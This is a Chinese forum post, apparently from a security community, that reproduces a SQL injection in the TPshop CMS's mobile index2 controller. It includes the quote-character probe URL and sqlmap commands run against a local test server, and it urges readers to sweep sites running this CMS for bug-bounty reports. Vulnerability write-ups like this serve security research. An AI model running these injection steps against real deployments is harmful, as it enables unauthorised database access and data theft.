因为最近在刷src,心累~~像我这种小白往往找不到几个漏洞,用google语法去找的话效率太慢,又累,漏洞数还少,所以想尝试一下用cms通杀来找漏洞。前天刚复现出来的。没准小伙伴们能利用去刷几个漏洞呢
ThinkPHP-Shop简称TPshop,是一套商城的开源系统的cms!它…..(这里省略一千个字)
这里是下载源码的网址,去他们官网下载最新版的cms来复现
http://www.tp-shop.cn/
把他下载下来搭建环境
打开CMS源码,追溯到/application/mobile/controller/index.php中的index2方法
也就是66-75行
66 : 获取用户从get输入的参数id的值并赋值给$id
67 : 获取用户从get输入的参数role的值并赋值给$role
69 : 判断$role是否为真
70 : 将$id拼接到where语句中
73 : 判断$id是否为真
75 : 将$id拼接到where语句中
由于id参数可控且未被过滤直接被拼接到where子句中从而造成了SQL注入
只要在首页的域名后面加上/mobile/index/index2/id/1’
如果报错为这个样子,就说明存在注入
还等啥呢?直接sqlmap一顿梭
以至于sqlmap语法Onlywait前辈说要这样使用sqlmap -u "http://172.16.209.129:8084/mobile/index/index2/id/1*" --random-agent --batch --dbms "mysql"
但是我尝试过了自己正常语句跑也能出来 我只是觉得这个语句太长了,懒得打
就直接sqlmap -u "http://172.16.209.129:8084/mobile/index/index2/id/1*" --batch
你看,还是能跑出来的
一下步我就不再演示了
补充:刷src的小伙伴们赶紧去刷起来吧,我这个也只是刷了几个而已,我懒得弄哈哈哈
答应我不要做白嫖怪,好吗,点个赞也行
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
奖励系统 | 100.00 | 0 | 2021-02-14 17:05:40 | 投稿满 10 赞奖励 |
奖励系统 | 50.00 | 0 | 2021-02-12 21:09:31 | 投稿满 5 赞奖励 |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
spider
发表于 2021-2-10
记得三连
评论列表
加载数据中...
治秃用霸王
发表于 2022-7-9
菜鸡路过
评论列表
加载数据中...